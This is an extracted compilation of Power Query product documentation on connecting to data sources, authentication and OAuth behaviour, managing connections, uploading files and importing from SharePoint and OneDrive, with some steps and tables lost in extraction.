Power Query
Power Query
e OVERVIEW
c HOW-TO GUIDE
Get data
Transform data
p CONCEPT
Dataflow licenses
p CONCEPT
Query folding
Query diagnostics
Error handling
c HOW-TO GUIDE
Reference content
i REFERENCE
M language reference
What is Power Query?
Article • 06/28/2023
Power Query is a data transformation and data preparation engine. Power Query comes
with a graphical interface for getting data from sources and a Power Query Editor for
applying transformations. Because the engine is available in many products and services,
the destination where the data will be stored depends on where Power Query was used.
Using Power Query, you can perform the extract, transform, and load (ETL) processing of
data.
Finding and connecting to Power Query enables connectivity to a wide range of data
data is too difficult sources, including data of all sizes and shapes.
Existing challenge How does Power Query help?
Experiences for data Consistency of experience, and parity of query capabilities over all
connectivity are too data sources.
fragmented
Data often needs to be Highly interactive and intuitive experience for rapidly and
reshaped before iteratively building queries over any data source, of any size.
consumption
Any shaping is one-off and When using Power Query to access and transform data, you
not repeatable define a repeatable process (query) that can be easily refreshed in
the future to get up-to-date data.
In the event that you need to modify the process or query to
account for underlying data or schema changes, you can use the
same interactive and intuitive experience you used when you
initially defined the query.
Volume (data sizes), velocity Power Query offers the ability to work against a subset of the
(rate of change), and variety entire dataset to define the required data transformations,
(breadth of data sources and allowing you to easily filter down and transform your data to a
data shapes) manageable size.
Power Query queries can be refreshed manually or by taking
advantage of scheduled refresh capabilities in specific products
(such as Power BI) or even programmatically (by using the Excel
object model).
Because Power Query provides connectivity to hundreds of data
sources and over 350 different types of data transformations for
each of these sources, you can work with data from any source
and in any shape.
The Power Query Editor is the primary data preparation experience, where you can
connect to a wide range of data sources and apply hundreds of different data
transformations by previewing data and selecting transformations from the UI. These
data transformation capabilities are common across all data sources, whatever the
underlying data source limitations.
When you create a new transformation step by interacting with the components of the
Power Query interface, Power Query automatically creates the M code required to do
the transformation so you don't need to write any code.
7 Note
Although two Power Query experiences exist, they both provide almost the same
user experience in every scenario.
Transformations
The transformation engine in Power Query includes many prebuilt transformation
functions that can be used through the graphical interface of the Power Query Editor.
These transformations can be as simple as removing a column or filtering rows, or as
common as using the first row as a table header. There are also advanced
transformation options such as merge, append, group by, pivot, and unpivot.
All these transformations are made possible by choosing the transformation option in
the menu, and then applying the options required for that transformation. The following
illustration shows a few of the transformations available in Power Query Editor.
Dataflows
Power Query can be used in many products, such as Power BI and Excel. However, using
Power Query within a product limits its usage to only that specific product. Dataflows
are a product-agnostic service version of the Power Query experience that runs in the
cloud. Using dataflows, you can get data and transform data in the same way, but
instead of sending the output to Power BI or Excel, you can store the output in other
storage options such as Dataverse or Azure Data Lake Storage. This way, you can use the
output of dataflows in other products and services.
The M language is the data transformation language of Power Query. Anything that
happens in the query is ultimately written in M. If you want to do advanced
transformations using the Power Query engine, you can use the Advanced Editor to
access the script of the query and modify it as you want. If you find that the user
interface functions and transformations won't perform the exact changes you need, use
the Advanced Editor and the M language to fine-tune your functions and
transformations.
Power Query M
let
Source = Exchange.Contents("[email protected]"),
Mail1 = Source{[Name="Mail"]}[Data],
#"Expanded Sender" = Table.ExpandRecordColumn(Mail1, "Sender", {"Name"},
{"Name"}),
#"Filtered Rows" = Table.SelectRows(#"Expanded Sender", each
([HasAttachments] = true)),
#"Filtered Rows1" = Table.SelectRows(#"Filtered Rows", each ([Subject] =
"sample files for email PQ test") and ([Folder Path] = "\Inbox\")),
#"Removed Other Columns" = Table.SelectColumns(#"Filtered Rows1",
{"Attachments"}),
#"Expanded Attachments" = Table.ExpandTableColumn(#"Removed Other
Columns", "Attachments", {"Name", "AttachmentContent"}, {"Name",
"AttachmentContent"}),
#"Filtered Hidden Files1" = Table.SelectRows(#"Expanded Attachments",
each [Attributes]?[Hidden]? <> true),
#"Invoke Custom Function1" = Table.AddColumn(#"Filtered Hidden Files1",
"Transform File from Mail", each #"Transform File from Mail"
([AttachmentContent])),
#"Removed Other Columns1" = Table.SelectColumns(#"Invoke Custom
Function1", {"Transform File from Mail"}),
#"Expanded Table Column1" = Table.ExpandTableColumn(#"Removed Other
Columns1", "Transform File from Mail", Table.ColumnNames(#"Transform File
from Mail"(#"Sample File"))),
#"Changed Type" = Table.TransformColumnTypes(#"Expanded Table Column1",
{{"Column1", type text}, {"Column2", type text}, {"Column3", type text},
{"Column4", type text}, {"Column5", type text}, {"Column6", type text},
{"Column7", type text}, {"Column8", type text}, {"Column9", type text},
{"Column10", type text}})
in
#"Changed Type"
1M engine The underlying query execution engine that runs queries expressed in
the Power Query formula language ("M").
2Power Query Desktop The Power Query experience found in desktop applications.
3Power Query Online The Power Query experience found in web browser applications.
4Dataflows Power Query as a service that runs in the cloud and is product-agnostic.
The stored result can be used in other applications as services.
See also
Data sources in Power Query
Getting data
Power Query quickstart
Shape and combine data using Power Query
What are dataflows
Getting data overview
Article • 04/10/2023
Power Query can connect to many different data sources so you can work with the data
you need. This article walks you through the steps for bringing in data to Power Query
either in Power Query Desktop or Power Query Online.
Connecting to a data source with Power Query follows a standard set of stages before
landing the data at a destination. This article describes each of these stages.
) Important
In some cases, a connector might have all stages of the get data experience, and in
other cases a connector might have just a few of them. For more information about
the experience of a specific connector, go to the documentation available for the
specific connector by searching on the Connectors in Power Query article.
1. Connection settings
2. Authentication
3. Data preview
4. Query destination
1. Connection settings
Most connectors initially require at least one parameter to initialize a connection to the
data source. For example, the SQL Server connector requires at least the host name to
establish a connection to the SQL Server database.
In comparison, when trying to connect to an Excel file, Power Query requires that you
use the file path to find the file you want to connect to.
7 Note
Some connectors don't require you to enter any parameters at all. These are called
singleton connectors and will only have one data source path available per
environment. Some examples are Adobe Analytics, MailChimp, and Google
Analytics.
2. Authentication
Every single connection that's made in Power Query has to be authenticated. The
authentication methods vary from connector to connector, and some connectors might
offer multiple methods of authentication.
For example, the available authentication methods for the SQL Server database
connector are Windows, Database, and Microsoft account.
3. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.
Depending on the connector that you're using, you can preview data by using either:
Navigator window
Table preview dialog box
The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.
7 Note
For Power Query in Excel, select the Select multiple items option from the
upper-left corner of the navigation window to select more than one object at
a time in the object selection pane.
7 Note
The list of objects in Power Query Desktop is limited to 10,000 items. This limit
does not exist in Power Query Online. For a workaround in Power Query
Desktop, see Object limitation workaround.
The data preview pane on the right side of the window shows a preview of the
data from the object you selected.
There’s a fixed limit of 10,000 objects in the Navigator in Power Query Desktop. This
limit doesn’t occur in Power Query Online. Eventually, the Power Query Online UI will
replace the one in the desktop.
1. Right-click on the root node of the Navigator, and then select Transform Data.
2. Power Query Editor then opens with the full navigation table in the table preview
area. This view doesn't have a limit on the number of objects, and you can use
filters or any other Power Query transforms to explore the list and find the rows
you want (for example, based on the Name column).
3. Upon finding the item you want, you can get at the contents by selecting the data
link (such as the Table link in the following image).
4. Query destination
This is the stage in which you specify where to load the query. The options vary from
integration to integration, but the one option that's always available is loading data to
the Power Query editor to further transform and enrich the query.
Power Query Online experience
The stages for getting data in Power Query Online are:
2. Data preview
3. Query editor
Connection settings
Connection credentials
Connection settings
In the connection settings section, you define the information needed to establish a
connection to your data source. Depending on your connector, that could be the name
of the server, the name of a database, a folder path, a file path, or other information
required by the connector to establish a connection to your data source. Some
connectors also enable specific subsections or advanced options to give you more
control and options when connecting to your data source.
Connection credentials
The first time that you use Power Query to connect to a specific data source, you're
required to create a new connection associated with that data source. A connection is
the full definition of the gateway, credentials, privacy levels, and other connector-
specific fields that make up the connection credentials required to establish a
connection to your data source.
7 Note
Some connectors offer specific fields inside the connection credentials section to
enable or define any sort of security related to the connection that needs to be
established. For example, the SQL Server connector offers the Use Encrypted
Connection field.
The primary information required by all connectors to define a connection are:
Connection name: This is the name that you can define to uniquely identify your
connections. Note that you can't duplicate the name of a connection in your
environment.
Data gateway: If your data source requires a data gateway, select the gateway
using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, as well as fields where you enter your credentials. For this example, the
Windows authentication kind has been selected and you can see the Username
and Password fields that need to be filled in to establish a connection.
Privacy level: You can define the privacy level for your data source to be either
None, Private, Organizational, or Public.
7 Note
To learn more about what data gateways are and how to register a new gateway for
your environment or tenant, go to Using on-premises data gateway.
) Important
Once you've defined a connection in Power Query Online, you can reuse the same
connection later on without reentering all this information again. The Connection field
offers a dropdown menu where you select your already defined connections. Once
you've selected your already defined connection, you don't need to enter any other
details before selecting Next.
After you select a connection from this menu, you can also make changes to the
credentials, privacy level, and other connector-specific fields for your data source in your
project. Select Edit connection, and then change any of the provided fields.
2. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.
Depending on the connector that you're using, you can preview data by using either:
Navigator window
Table preview dialog box
The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.
The data preview pane on the right side of the window shows a preview of the
data from the object you selected.
3. Query editor
For Power Query Online, you're required to load the data into the Power Query editor
where you can further transform and enrich the query if you choose to do so.
Additional information
To better understand how to get data using the different product integrations of Power
Query, go to Where to get data.
Where to get data
Article • 07/28/2023
Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides basic steps for getting data from each of the
Microsoft products that include Power Query.
7 Note
Each of these Power Query get data experiences contain different feature sets.
More information: Where can you use Power Query?
In Power BI Desktop, you can also directly select an Excel worksheet, a Power BI dataset,
a SQL server database, or Dataverse data without using the Get data option. You can
also enter data directly in a table, or select from a data source that was recently used.
2. Scroll through the category selections in the get data context menu, and select the
connector you want to use.
You'll then be asked to fill out information that's required for you to access the data. Go
to the individual connector articles for more information about this required
information.
In Excel, you can also directly select Text/CVS, Web, and Excel worksheet data without
using the Get Data option. You can also select from a data source that was recently used
and from existing connections or tables.
7 Note
Not all Excel versions support all of the same Power Query connectors. For a
complete list of the Power Query connectors supported by all versions of Excel for
Windows and Excel for Mac, go to Power Query data sources in Excel versions .
Get data in Power BI service
To get data in Power BI service:
1. On the left side of Power BI service, select Workspaces (but not My Workspace).
2. From the Workspace context menu, select the workspace you want to use.
3. From the workspace (in this example, TestWorkspace01), select the context menu
next to +New.
6. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.
7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
You can also choose to get data directly from an Excel worksheet without using the
Import data option.
3. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.
4. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
Select a table in the Tables pane that you want to import data to, and then
select Import > Import data.
Open the table to its individual pane, and then select Import > Import data.
In either case, you can also choose to get data from an Excel worksheet without
using the Import data option.
b. In the New dataflow dialog box, enter a name for your new dataflow.
c. Select Create.
1. On the left side of Customer Insights, select Data > Data sources.
4. In Save data source as, enter a name for your data source.
5. Select Next.
6. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.
7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
1. On the left side of Data Factory, select Workspaces (but not My Workspace).
2. From your Data Factory workspace, select New > Dataflow Gen2 (Preview) to
create a new dataflow.
3. In Power Query, either select Get data in the ribbon or select Get data from
another source in the current view.
4. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.
5. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
The Analysis Services documentation contains the following information that describes
the process for getting data:
To set up a Visual Studio solution with the Analysis Services projects extension:
Create a tabular model project
1. On the left side of Power Automate, select Data > Tables. At this point, a new tab
with Power Apps will open in your browser.
2. In the Power Apps tab, follow the instructions for importing data to either a new
table or to an existing table in the Power Apps section.
For information about how to get data in process advisor, go to Connect to a data
source.
However, Azure Data Factory does use Power Query to transform data in data wrangling.
The following Azure Data Factory articles describe how to use Power Query for data
wrangling:
Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides an explanation of the different modules in the
modern get data experience.
7 Note
Each of these Power Query get data experiences contain different feature sets.
More information: Where can you use Power Query?
The procedures for where to start getting data in Power BI Desktop are described in
Data sources in Power BI Desktop.
The new modular experience in Power Query Online is separated into different modules
located on the left side navigation bar. These modules include:
Home (all)
Templates (Power BI service only)
OneLake Data Hub (Fabric only)
New (all)
Upload (all)
Blank Table (all)
Blank Query (all)
Home
The home page acts as a summary of all the modules and presents you with different
options to expedite the process and get you closer to your data. Typically, this module
contains any existing data sources and gives you the option to use a new data source,
table, and upload files. From the home page, you can select View more on the right side
of the New sources and OneLake data hub sections to visit those modules.
Templates
A dataflow template provides a predefined set of entities and field mappings to enable
flow of data from your source to the destination, in the Common Data Model. A
dataflow template commoditizes the movement of data, which in turn reduces overall
burden and cost for a business user. It provides you with a head start to ingest data
wherein you don’t need to worry about knowing and mapping the source and
destination entities and fields—we do it for you, through dataflow templates. For more
information about templates, go to Introducing dataflow templates; A quick and
efficient way to build your sales leaderboard and get visibility over your sales pipeline .
New
The new module provides a full list of connectors that you can select from. On this page,
you can search for a connector across all categories by using the search bar at the top of
page. You can also navigate across the categories to find a specific connector to
integrate with. Selecting a connector here opens the connection settings window, which
begins the process of connecting. For more information on using connectors, go to
Getting data overview.
Upload
The Upload module lets you upload your files directly. The following connectors support
this capability:
Excel
JSON
PDF
Text/CSV
XML
This module is an extension of this capability and lets you select the browse button to
upload a local file, or even drag and drop a file. For more information on uploading files,
go to Upload a file.
Blank table
The Blank table module provides a quick start in creating a table in a dataflow.
Blank query
The Blank query module lets you write or paste your own M script to create a new
query.
Authentication with a data source
Article • 02/17/2023
When you attempt to connect to a data source using a new connector for the first time,
you might be asked to select the authentication method to use when accessing the
data. After you've selected the authentication method, you won't be asked to select an
authentication method for the connector using the specified connection parameters.
However, if you need to change the authentication method later, you can do so.
If you're using a connector from an online app, such as the Power BI service or Power
Apps, you'll see an authentication method dialog box for the OData Feed connector that
looks something like the following image.
As you can see, a different selection of authentication methods is presented from an
online app. Also, some connectors might ask you to enter the name of an on-premises
data gateway to be able to connect to your data.
The level you select for the authentication method you chose for this connector
determines what part of a URL will have the authentication method applied to it. If you
select the top-level web address, the authentication method you select for this
connector will be used for that URL address or any subaddress within that address.
However, you might not want to set the top-level address to a specific authentication
method because different subaddresses can require different authentication methods.
One example might be if you were accessing two separate folders of a single SharePoint
site and wanted to use different Microsoft accounts to access each one.
After you've set the authentication method for a connector's specific address, you won't
need to select the authentication method for that connector using that URL address or
any subaddress again. For example, let's say you select the https://contoso.com/
address as the level you want the Web connector URL settings to apply to. Whenever
you use a Web connector to access any webpage that begins with this address, you
won't be required to select the authentication method again.
In Power BI Desktop, on the File tab, select Options and settings > Data
source settings.
In Excel, on the Data tab, select Get Data > Data Source Settings.
2. In the Data source settings dialog box, select Global permissions, choose the
website where you want to change the permission setting, and then select Edit
Permissions.
You can also delete the credentials for a particular website in step 3 by selecting Clear
Permissions for a selected website, or by selecting Clear All Permissions for all of the
listed websites.
To edit the authentication method in online services, such as for dataflows in the
Power BI service and Microsoft Power Platform
This section outlines connection symptoms when the service isn't configured properly. It
also provides information on how Power Query interacts with the service when it's
properly configured.
1. Enter the Northwind endpoint in the "Get Data" experience using the OData
connector.
Supported workflow
One example of a supported service working properly with OAuth is CRM, for example,
https://*.crm.dynamics.com/api/data/v8.2 .
1. Enter the URL in the "Get Data" experience using the OData connector.
2. Select Organizational Account, and then select Sign-in to proceed to connect
using OAuth.
3. The request succeeds and the OAuth flow continues to allow you to authenticate
successfully.
When you select Sign-in in Step 2 above, Power Query sends a request to the provided
URL endpoint with an Authorization header with an empty bearer token.
The service is then expected to respond with a 401 response with a WWW_Authenticate
header indicating the Azure AD authorization URI to use. This response should include
the tenant to sign into, or /common/ if the resource isn’t associated with a specific
tenant.
HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Type: text/html
Server:
WWW-Authenticate: Bearer
authorization_uri=https://login.microsoftonline.com/3df2eaf6-33d0-4a10-8ce8-
7e596000ebe7/oauth2/authorize
Date: Wed, 15 Aug 2018 15:02:04 GMT
Content-Length: 49
Power Query can then initiate the OAuth flow against the authorization_uri. Power
Query requests an Azure AD Resource or Audience value equal to the domain of the
URL being requested. This value would be the value you use for your Azure Application
ID URL value in your API/service registration. For example, if accessing
https://api.myservice.com/path/to/data/api , Power Query would expect your
The following Azure Active Directory client IDs are used by Power Query. You might
need to explicitly allow these client IDs to access your service and API, depending on
your overall Azure Active Directory settings.
a672d62c-fc7b-4e81-a576- Power Query for Excel Public client, used in Power BI Desktop
e60dc46e951d and Gateway.
You might need to explicitly allow these client IDs to access your service and API,
depending on your overall Azure Active Directory settings. Go to step 8 of Add a scope
for more details.
If you need more control over the OAuth flow (for example, if your service must respond
with a 302 rather than a 401 ), or if your application’s Application ID URL or Azure AD
Resource value don't match the URL of your service, then you’d need to use a custom
connector. For more information about using our built-in Azure AD flow, go to Azure
Active Directory authentication.
Connections and authentication in
Power Query Online
Article • 02/17/2023
In Power Query Online, a connection refers to the unique identifier and associated
credentials used to establish a connection to a particular data source. One convenient
feature of connections in Power Query is that you can create multiple connections
against the same data source with different credentials.
Creating a connection
During the get data experience in Power Query Online, you'll find a dialog where you
enter information to create and establish a connection to your data source. The process
is standard for all connectors in Power Query, but some connectors might require more
information in order to create a connection.
After entering the values for the connector settings in the Connection settings section,
you can proceed with the Connection credentials section. In this section, you can create
a connection specific to the connection settings you previously entered.
The following table contains the fields and values used in the Connection settings
section.
Connection The name you can enter for your new connection. Sample
Name Connection
Data Gateway An optional field that lets you bind a gateway to your none
connection. For cloud connections, there's no gateway
binding to the connection.
Authentication The authentication kind you select to use that's supported Organizational
Kind by the connector. account
Credentials Depending on the authentication kind you select, there will Derived from
be available a contextual set of fields to input your OAuth2 flow, but
credentials, a button to launch an OAuth2 flow, or even no is shown as a
fields at all for an authentication kind such as Anonymous. Sign in button in
the image
7 Note
By default, the field for the connection name tries to provide a default name when
you create a connection using the information from the connection settings.
After finishing the Connection settings section, you select the Next button to move
forward in the get data experience.
Tip
Some connectors provide an auto sign in experience. To learn more about this
feature, go to auto sign in.
7 Note
To create a gateway you can read the article on using an on-premises data
gateway in dataflows.
Using a local SQL Server database as an example, you enter the connector settings to
establish a connection. For the SQL Server connector, the required setting is just the
server name, but you can also enter the name of the database and select any other
advanced options available for the connector. For demonstration purposes, both the
server name and database have been entered.
After entering the values for the connector in Connection settings, you can proceed
with the Connection credentials section. In this section, you can create a connection
specific to the connection settings you previously entered.
The following table contains the fields and values used in the Connection settings
section.
Connection The name you can enter for your new localhost;AdventureWorks2019
Name connection
Data Gateway An optional field that lets you bind a gateway Mike Test
to your connection.
After finishing the Connection settings section, you select the Next button to move
forward within the get data experience.
Components of a connection
Each connection is made up of a set of components. The following table contains more
information for each component.
Data Source Required The data source for which the connection is SQL Server, File,
kind being established. Folder, Azure
Data Lake
Storage
Data Source Required A string that represents the values or Server Name,
path parameters used to establish a connection to Database Name
your data source.
Gateway Optional Used when a gateway is needed to establish the Any gateway
connection and execute any query evaluation.
Privacy level Optional Establishes the security for each connection, None, Public,
which is taken into consideration when queries Organizational,
from different connections are combined. Private
) Important
Currently, the privacy level is set to None for any new connections created. When
you try to combine multiple data sources, a new dialog prompts you to define the
data privacy levels of the data sources that you want to combine.
Known connections
When Power Query recognizes a set of connection settings, it tries to look up in its
respective credentials storage to see if there's a connection that matches those settings
and, if so, automatically selects that connection.
To override this behavior, you can take either of the following two actions:
Display the dropdown menu to scan a list of available connections for the given
connection settings. You can then select the one that you'd like to use or create a
new one.
Select Edit connection to modify the existing connection or select Create new
connection from the dropdown menu to create a new named connection.
More resources
List of connectors in Power Query
On-premises data gateways documentation
Change the gateway used in a dataflow
Troubleshooting dataflow issues: Connection to the data source
Auto sign in for Azure Active Directory
data sources
Article • 10/06/2022
The auto sign-in feature attempts to automatically sign you in as the current user when
connecting to data sources in Power Query that use Azure Active Directory as one of
their authentication kinds. It does this auto sign-in to expedite the authentication
process and minimize the time it takes to start working with your data.
More technically, the auto sign-in feature for Azure Active Directory data sources uses
the information derived from the currently authenticated user in the Power Query
Online experience. This information is then used to request a new access token for a
selected data source during the connection settings and authentication steps of the get
data process.
7 Note
This functionality is currently only available in Power Query Online and is enabled
by default for a select set of connectors. No configuration is needed to enable this
feature.
When selecting a connector that has this capability, it automatically signs you in with
Organizational account set as the authentication kind.
Tip
If you'd like to authenticate with a different account, select the Switch account link
shown in the dialog.
Further reading
Authentication in Power Query Online
Microsoft identity platform and OAuth 2.0 On-Behalf-Of flow
Upload a file (Preview)
Article • 02/17/2023
You can upload files to your Power Query project when using Power Query Online.
Excel
JSON
PDF
Text / CSV
XML
7 Note
Only files with the following extensions are supported for upload: .csv, .json, .pdf,
.prn, .tsv, .txt, .xl, .xls, .xlsb, .xlsm, .xlsw, .xlsx, .xml.
After you've selected your file, a progress bar shows you how the upload process is
going. Once the upload process is finished, you'll be able to see a green check mark
underneath your file name, with the message Upload successful and the file size right
next to it.
7 Note
The files that are uploaded through this feature are stored in your personal
Microsoft OneDrive for Business account.
Before you select the next button, you need to change the authentication kind from
Anonymous to Organizational account and go through the authentication process.
Start this process by selecting Sign in.
After going through the authentication process, a You are currently signed in message
underneath the Authentication Kind selection let's you know that you've successfully
signed in. After you've signed in, select Next. The file is then stored in your personal
Microsoft OneDrive for Business account, and a new query is created from the file that
you've uploaded.
Drag and drop experience in the query editor
When using the Power Query editor, you can drop a file on either the diagram view or
the queries pane to upload a file.
When dropping the file on either of the previously mentioned sections, a dialog with the
appropriate connector settings page will be shown, based on the file extension of the
file that's being uploaded.
SharePoint and OneDrive for Business
files import
Article • 02/17/2023
Power Query offers a series of ways to gain access to files that are hosted on either
SharePoint or OneDrive for Business.
Browse files
7 Note
Currently, you can only browse for OneDrive for Business files of the authenticated
user inside of Power Query Online for PowerApps.
2 Warning
This feature requires your browser to allow third party cookies. If your browser has
blocked third party cookies, the Browse dialog will appear but it'll be completely
blank with no option to close the dialog.
Power Query provides a Browse OneDrive button next to the File path or URL text box
when you create a dataflow in PowerApps using any of these connectors:
Excel
JSON
PDF
XML
TXT/CSV
When you select this button, you'll be prompted to go through the authentication
process. After completing this process, a new window appears with all the files inside the
OneDrive for Business of the authenticated user.
You can select the file of your choice, and then select the Open button. After selecting
Open, you'll be taken back to the initial connection settings page where you'll see that
the File path or URL text box now holds the exact URL to the file you've selected from
OneDrive for Business.
You can select the Next button at the bottom-right corner of the window to continue
the process and get your data.
7 Note
Your browser interface might not look exactly like the following image. There
are many ways to select Open in Excel for files in your OneDrive for Business
browser interface. You can use any option that allows you to open the file in
Excel.
2. In Excel, select File > Info, and then select the Copy path button.
To use the link you just copied in Power Query, take the following steps:
3. Remove the ?web=1 string at the end of the link so that Power Query can properly
navigate to your file, and then select OK.
4. If Power Query prompts you for credentials, choose either Windows (for on-
premises SharePoint sites) or Organizational Account (for Microsoft 365 or
OneDrive for Business sites). The select Connect.
U Caution
When working with files hosted on OneDrive for Home, the file that you want
to connect to needs to be publicly available. When setting the authentication
method for this connection, select the Anonymous option.
When the Navigator dialog box appears, you can select from the list of tables, sheets,
and ranges found in the Excel workbook. From there, you can use the OneDrive for
Business file just like any other Excel file. You can create reports and use it in datasets
like you would with any other data source.
7 Note
To use a OneDrive for Business file as a data source in the Power BI service, with
Service Refresh enabled for that file, make sure you select OAuth2 as the
Authentication method when configuring your refresh settings. Otherwise, you
may encounter an error (such as, Failed to update data source credentials) when you
attempt to connect or to refresh. Selecting OAuth2 as the authentication method
remedies that credentials error.
After successfully establishing the connection, you'll be prompted with a table preview
that shows the files in your SharePoint site. Select the Transform data button at the
bottom right of the window.
Selecting the Transform Data button will take you to a view of the data called the File
system view. Each of the rows in this table represents a file that was found in your
SharePoint site.
The table has a column named Content that contains your file in a binary format. The
values in the Content column have a different color than the rest of the values in the
other columns of the table, which indicates that they're selectable.
By selecting a Binary value in the Content column, Power Query will automatically add a
series of steps in your query to navigate to the file and interpret its contents where
possible.
For example, from the table shown in the previous image, you can select the second row
where the Name field has a value of 02-February.csv. Power Query will automatically
create a series of steps to navigate and interpret the contents of the file as a CSV file.
7 Note
You can interact with the table by applying filters, sortings, and other transforms
before navigating to the file of your choice. Once you've finished these transforms,
select the Binary value you want to view.
https://contoso-
my.sharepoint.com/personal/user123_contoso_com/_layouts/15/onedrive.aspx
You don't need the full URL, but only the first few parts. The URL you need to use in
Power Query will have the following format:
https://<unique_tenant_name>.sharepoint.com/personal/<user_identifier>
For example:
https://contoso-my.sharepoint/personal/user123_contoso_com
SharePoint.Contents function
While the SharePoint folder connector offers you an experience where you can see all
the files available in your SharePoint or OneDrive for Business site at once, you can also
opt for a different experience. In this experience, you can navigate through your
SharePoint or OneDrive for Business folders and reach the folder or file(s) that you're
interested in.
SharePoint.Contents("https://contoso.sharepoint.com/marketing/data")
7 Note
[ApiVersion="Auto"]) .
3. Power Query will request that you add an authentication method for your
connection. Use the same authentication method that you'd use for the SharePoint
files connector.
4. Navigate through the different documents to the specific folder or file(s) that
you're interested in.
For example, imagine a SharePoint site with a Shared Documents folder. You can
select the Table value in the Content column for that folder and navigate directly
to that folder.
Inside this Shared Documents folder there's a folder where the company stores all
the sales reports. This folder is named Sales Reports. You can select the Table value
on the Content column for that row.
With all the files inside the Sales Reports folder, you could select the Combine files
button (see Combine files overview) to combine the data from all the files in this
folder to a single table. Or you could navigate directly to a single file of your
choice by selecting the Binary value from the Content column.
7 Note
Connecting to Microsoft Graph REST APIs from Power Query isn't recommended or
supported. Instead, we recommend users explore alternative solutions for retrieving
analytics data based on Graph, such as Microsoft Graph data connect.
You might find you can make certain REST calls to Microsoft Graph API endpoints work
through the Web.Contents or OData.Feed functions, but these approaches aren't reliable
as long-term solutions.
This article outlines the issues associated with Microsoft Graph connectivity from Power
Query and explains why it isn't recommended.
Authentication
The built-in Organizational Account authentication flow for Power Query's Web.Contents
and OData.Feed functions isn't compatible with most Graph endpoints. Specifically,
Power Query's Azure Active Directory (Azure AD) client requests the user_impersonation
scope, which isn't compatible with Graph's security model. Graph uses a rich set of
permissions that aren't available through our generic Web and OData connectors.
Implementing your own Azure AD credential retrieval flows directly from your query, or
using hardcoded or embedded credentials, also isn't recommended for security reasons.
While Power BI Desktop offers out-of-box connectivity to over 150 data sources, there
might be cases where you want to connect to a data source for which no out-of-box
connector is available.
For example, the ODBC connector can connect to services with ODBC interfaces, and the
Web connector can connect to services with REST API interfaces.
Community members and organizations can also share custom connectors that they've
created. While Microsoft doesn't offer any support, ownership, or guarantees for these
custom connectors, you might be able to use them for your scenarios. The Power BI
Partner Program also includes many partners that can build custom connectors. To learn
more about the program or find a partner, go to Contact a Power BI Partner .
Users that own an end service or data source can create a custom connector and might
be eligible to certify the connector to have it made available publicly out-of-box within
Power BI Desktop.
Request the data source owner to build and
certify a connector
As only the data source owner or an approved third party can build and certify a custom
connector for any service, end users are encouraged to share the demand for a
connector directly with the data source owner to encourage investment into creating
and certifying one.
You can connect to a multitude of different data sources using built-in connectors that
range from Access databases to Zendesk resources. You can also connect to all sorts of
other data sources to further expand your connectivity options, by using the generic
interfaces (such as ODBC or REST APIs) built into Power Query Desktop and Power
Query Online.
In addition, you can also connect to data sources that aren't identified in the get data
and choose data source lists by using one of the following generic data interfaces:
ODBC
OLE DB
OData
REST APIs
R Scripts
By providing the appropriate parameters in the connection windows that these generic
interfaces provide, the world of data sources you can access and use in Power Query
grows significantly.
In the following sections, you can find lists of data sources that can be accessed by
these generic interfaces.
Power Query generic connector External data source Link for more information
Power BI Desktop generic connector External data source Link for more information
7 Note
This feature is currently available only in Power Query Online and is in public
preview.
With Power Query, you can connect to a multitude of data sources. When you connect
to a data source, you fundamentally create a connection to it. This connection consists
of your data source, credentials, and more information, such as privacy levels and
optional parameters for each data source. The Manage connections dialog is one
centralized way in your Power Query project to manage the connections that are being
referenced by your project.
The entry to the Manage connections dialog is available in the Power Query Home tab
in the ribbon's Data sources group.
Manage connections displays a list of all connections being referenced in your Power
Query project. It also notes the ability to unlink and edit from any of the connections in
your project.
Unlink a connection
Right next to the name of connection, and before the Source type column, there's an
icon to unlink the connection.
When you unlink a connection, you're simply removing the reference of the connection
from your project. Unlinking means that the definition of the connection isn't removed
from the back-end, but it can't be used in your project.
A new prompt then asks you to confirm that you want to unlink the connection.
7 Note
If you want to delete a connection from within a specific product integration, such
as Microsoft Power BI or Microsoft Fabric, be sure to check out the documentation
for each product on how a centralized connections portal can be used.
Edit a connection
Right next to the name of connection, and before the disconnect icon, there's an icon to
edit the connection.
Data gateway: If your data source uses a data gateway, you can modify the
gateway using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, and fields where you enter your credentials.
More Resources
Get Data experience in Power Query
Connectors available in Power Query
Change the gateway used in a dataflow
project
Article • 05/25/2023
When creating a new dataflow project in Power Query Online, you can select the on-
premises data gateway used for your specific data sources during the get data
experience. This article showcases how you can modify or assign a gateway to an
existing dataflow project.
7 Note
Before being able to change a gateway, make sure that you have the needed
gateways already registered under your tenant and with access for the authors of
the dataflow project. You can learn more about data gateways from Using an on-
premises data gateway in Power Platform dataflows.
This query previously used a gateway named "Gateway A" to connect to the folder. But
"Gateway A" no longer has access to the folder due to new company policies. A new
